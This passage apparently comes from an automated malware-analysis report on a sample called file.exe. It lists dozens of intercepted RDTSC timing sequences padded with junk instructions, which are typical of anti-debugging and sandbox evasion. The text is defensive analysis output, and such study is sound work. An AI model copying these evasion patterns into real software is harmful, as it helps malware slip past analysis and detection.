              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B192A4 second address: B192BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D8BD second address: B1D8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D8C3 second address: B1D8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21645 second address: B21649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21649 second address: B2164F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2164F second address: B21655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2582D second address: B25837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD185A97D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25837 second address: B2584B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD184FDBE76h 0x00000008 jng 00007FD184FDBE76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2584B second address: B2584F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2584F second address: B25855 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25AE0 second address: B25AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25AE6 second address: B25B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD184FDBE85h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25B06 second address: B25B0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25B0C second address: B25B19 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD184FDBE78h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25B19 second address: B25B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD185A97D11h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FD185A97D10h 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25C46 second address: B25C55 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25DA5 second address: B25DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25DB4 second address: B25DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25DB8 second address: B25DBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25DBE second address: B25DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007FD184FDBE88h 0x0000000d js 00007FD184FDBE78h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2A717 second address: B2A71B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2A71B second address: B2A725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29E83 second address: B29EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FD185A97D13h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29EA1 second address: B29EBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE88h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29EBD second address: B29ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FD185A97D06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29ECD second address: B29ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30BA6 second address: B30BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F3D4 second address: B2F3D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F7F0 second address: B2F806 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FD185A97D0Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F806 second address: B2F80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F9A0 second address: B2F9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FD185A97D06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F9AE second address: B2F9B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F9B3 second address: B2F9B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FB57 second address: B2FB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FB5B second address: B2FB63 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FB63 second address: B2FBB2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD184FDBE86h 0x00000008 jno 00007FD184FDBE76h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007FD184FDBE7Ch 0x00000019 jc 00007FD184FDBE8Fh 0x0000001f push edx 0x00000020 pop edx 0x00000021 jmp 00007FD184FDBE87h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADEA9B second address: ADEADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FD185A97D08h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov di, cx 0x00000024 push 0000001Eh 0x00000026 mov edi, edx 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c je 00007FD185A97D06h 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3814B second address: B38153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3623A second address: B36242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B36814 second address: B36822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FD184FDBE76h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B36822 second address: B36826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B36826 second address: B36834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B36834 second address: B3683A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3683A second address: B3684B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD184FDBE7Ch 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B36B4E second address: B36B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B36E4E second address: B36E58 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD184FDBE76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B36E58 second address: B36E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B36E5E second address: B36E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD184FDBE7Eh 0x00000009 je 00007FD184FDBE76h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3717C second address: B37182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B37182 second address: B3718E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B37DD6 second address: B37DDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40794 second address: B40798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40798 second address: B4079C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40A25 second address: B40A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40A30 second address: B40A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD185A97D0Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40A43 second address: B40A6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE85h 0x00000007 jno 00007FD184FDBE76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007FD184FDBE76h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40E8B second address: B40E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40E8F second address: B40EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD184FDBE80h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B479E3 second address: B479EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B482E7 second address: B482EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B482EC second address: B482F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B486D8 second address: B486E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD184FDBE76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B486E2 second address: B48726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edx 0x00000008 jns 00007FD185A97D1Bh 0x0000000e pushad 0x0000000f jmp 00007FD185A97D18h 0x00000014 jnp 00007FD185A97D06h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B48726 second address: B4872C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4F880 second address: B4F886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5564C second address: B55668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD184FDBE88h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55668 second address: B55672 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD185A97D06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55672 second address: B55678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55678 second address: B55682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD185A97D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55682 second address: B5569A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE7Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FD184FDBE7Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B63F66 second address: B63F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B639F4 second address: B63A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FD184FDBE7Eh 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B63A0A second address: B63A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD185A97D06h 0x0000000a pop edi 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FD185A97D06h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B69C21 second address: B69C25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F570 second address: B6F58D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD185A97D17h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73592 second address: B73596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73596 second address: B735B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD185A97D10h 0x0000000b pop eax 0x0000000c jc 00007FD185A97D37h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B735B7 second address: B735BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B735BD second address: B735C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7538F second address: B75393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75249 second address: B7524F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7524F second address: B75264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FD184FDBE80h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7C5EC second address: B7C624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD185A97D0Ah 0x00000009 pop edi 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD185A97D18h 0x00000012 jmp 00007FD185A97D0Eh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7AE7E second address: B7AE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7AE82 second address: B7AE8B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7AE8B second address: B7AE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7AE91 second address: B7AE97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7AE97 second address: B7AE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7AE9F second address: B7AEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7AEA5 second address: B7AEC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD184FDBE7Ah 0x00000009 jc 00007FD184FDBE76h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7AEC0 second address: B7AEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B176 second address: B7B1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE87h 0x00000007 push edi 0x00000008 jnp 00007FD184FDBE76h 0x0000000e je 00007FD184FDBE76h 0x00000014 pop edi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007FD184FDBE82h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B1B7 second address: B7B1CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD185A97D0Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7C33B second address: B7C36B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE7Fh 0x00000007 jmp 00007FD184FDBE84h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7EBBF second address: B7EBC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7EBC6 second address: B7EBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD184FDBE76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83ACA second address: B83AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8D236 second address: B8D23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8D23C second address: B8D241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8D241 second address: B8D267 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FD184FDBE80h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9057B second address: B905A9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FD185A97D12h 0x00000010 jmp 00007FD185A97D0Ch 0x00000015 jmp 00007FD185A97D12h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B905A9 second address: B905D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE87h 0x00000007 push eax 0x00000008 jmp 00007FD184FDBE82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
